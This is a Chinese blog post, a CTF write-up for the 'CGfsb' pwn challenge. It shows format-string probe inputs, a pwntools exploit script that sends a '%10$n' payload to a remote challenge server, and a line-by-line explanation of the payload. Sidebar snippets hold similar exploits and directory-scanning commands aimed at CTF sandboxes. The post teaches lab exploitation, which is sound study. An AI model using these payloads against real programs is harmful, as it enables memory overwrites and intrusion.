CTF(pwn)-格式化字符串漏洞讲解(二) --攻防世界CGfsb

最新推荐文章于 2022-04-22 18:08:44 发布
最新推荐文章于 2022-04-22 18:08:44 发布
阅读量1k 收藏 8
点赞数 2
分类专栏: PWN学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/114081864
版权

格式化字符串漏洞介绍:

https://blog.csdn.net/weixin_45556441/article/details/114080930

一.分析

在这里插入图片描述在这里插入图片描述
pwnme的地址为 0x804A068

思路: 利用格式化字符串漏洞来使 pwnme的值为8;

二.做题过程

首先,我们得查一下我们输入进去的数据在栈中偏移了多少,知道偏移量后我们才能将其对应起来

在这里插入图片描述输入 AAAA,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x

或者 AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p

在这里插入图片描述可以得出,偏移量为10;
在这里插入图片描述

注:A转化为16进制是0x41

三.解题脚本

from pwn import *
p = remote('111.200.241.244', '52927')
p.recvuntil("please tell me your name")
p.send('小明')
p.recvuntil("leave your message please")
payload=p32(0x0804a068)+"aaaa%10$n"
p.send(payload)
p.interactive()

四. payload 详解:

  1. p32(0x0804a068)是pwnme的地址;

  2. "aaaa%10$n":
    aaaa是因为:这里四个a的作用是填充字符数,因为p32函数将pwnme地址转化成四个字节的小端序字符,我们希望写入pwnme的数字是8,因此再填充4个任意字符。

举个其他的例子🌰: %85c%7$n,作用是将85写入栈内第7个参数所指向的地址。

  1. 10 是指10个偏移量

  2. $ 是偏移符号

  3. %n -打印到目前为止所写的字符数

在这里插入图片描述在这里插入图片描述

半岛铁盒@
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一天一道ctf攻防世界-CGfsb
qq_42728977的博客
08-29 353
暑假笼统地学了Pwn,听的迷迷糊糊的,现在拾起来从头学。开始做题了,拿到程序扔进IDA。 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; // [esp+22h] [ebp-7Ah] __int16 v6; // [esp...
攻防世界 CGfsb-格式化字符串漏洞
Casuall的博客
05-21 699
引用维基百科https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_intro/ 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程...
xctf - cgfsb
just do IT
07-09 1407
查看程序保护 用IDA 打开 查看24行代码可知,通过修改全局变量pwnme = 8 则结束。 使用gdb 动态调试。 漏洞代码; pwnme 地址, exp: from pwn import * sh = remote('111.198.29.45',36640) sh.recv() sh.sendline('hacker') sh.recv() payload = p32(0x804a...
pwn刷题num10-----格式化字符串漏洞
tbsqigongzi的博客
04-22 363
攻防世界pwn新手区string 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启全部RELRO---got表不可写 开启canary保护---栈溢出需绕过canary 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 英文意思是:我们是巫师,我们会给你手,你不能自己打败龙...... 我们会告诉你两个秘密......秘密 [0]是6662a0秘密[1]是6662a4 不要告诉任何人 你的
python格式化字符串_从两道CTF实例看python格式化字符串漏洞
weixin_39638305的博客
11-14 824
什么是python格式化字符串漏洞pyhton中,存在几种格式化字符串的方式,然而当我们使用的方式不正确的时候,即格式化字符串能够被我们控制时,就会导致一些严重的问题,比如获取敏感信息python常见的格式化字符串百分号形式进行格式化字符串>>> name = 'Hu3sky' >>> 'My name is %s' %name 'My name i...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF-字符串编码识别工具,网络安全CTF比赛的好帮手!
06-10
在网络安全领域,特别是参与Capture The Flag (CTF)竞赛时,了解和掌握各种字符串编码识别工具至关重要。CTF比赛通常包含多种类型的问题,其中MISC(Miscellaneous)题型涉及广泛,包括密码学、逆向工程、取证分析等...
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
pwnme3题目
10-14
cmcc的ctfpwnme3的题目,欢迎大家一起学习交流做题的思路
CGCTF pwn CGfsb writeup
qq_39596232的博客
08-23 587
一、实验目的: 破解我的第一个pwn,获取flag(虽然也参考了别人*^*O*^*) 、实验环境: Ubuntu 18.04 / gdb-peda / pwntools Windows7 IDA pro 三、实验内容: 1、题目到手,我们拿到了一个网址和ELF文件,首先我们对ELF文件进行分析: tucker@ubuntu:~/pwn_files$ checksec...
CTF--2016湖湘杯全国网络安全技能大赛之栈溢出pwnme
关注互联网安全的小虾米一枚
03-30 6531
0x01 基础知识 本题目考察逆向分析,漏洞挖掘以及利用能力。 学习本篇技术,提前储备好栈溢出相关知识。 关键技术点 scanf函数溢出漏洞 0x02 基本分析 拿到题目先对其进行基本分析,使用工具checksec.sh脚本检测。 根据这个判断程序运行在32位系统之上。没有开启canary和nx保护。 猜测题目考察内容多为溢出漏洞。运行程序
CTF必备技能丨Linux Pwn入门教程——格式化字符串漏洞
dfdhxb995397的博客
07-31 404
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。 教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有...
格式化字符串漏洞学习笔记
宗泽的博客
08-19 220
参考:CTFwiki 0x1 原理 printf等格式化输入输出的语句,在缺少某些变量时,会出现的错误。 当输出语句为printf(“color %s,age: %d,s:%4.2lf”,“red”,12,3.14)时,会对应输出相应的内容, 但是如果没有输入对应的数值,printf语句就会因为没有相应的参数输出而去解析栈上存储格式化字符串地址上面的三个变量,并分别将其解析为 对应的字符串 对...
格式化字符串漏洞实验例子(一)easy
谭宇
03-10 634
1、goodluck 例子出处github,点击访问 checksec查防 root@user-virtual-machine:/mnt/hgfs/CTF/share/goodluck# checksec goodluck [*] '/mnt/hgfs/CTF/share/goodluck/goodluck' Arch: amd64-64-little RELRO:...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2019
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 797
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
ctfhub-git泄露stash
最新发布
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py http://challenge-e87e0210287ba7b3.sandbox.ctfhub.com:10800/.git/"来使用GitHack工具进行扫描和利用。同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,这些工具只是为了帮助你快速发现ctfhub-git的泄露,真正的挖掘过程并不会像这样直接告诉你哪里有泄露,需要自己去尝试和探索。此外,Git这一工具的使用也相当复杂,需要深入学习和实践才能熟练掌握。所以,在学习的道路上还有很长的路要走,希望你能坚持学习,共同进步!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值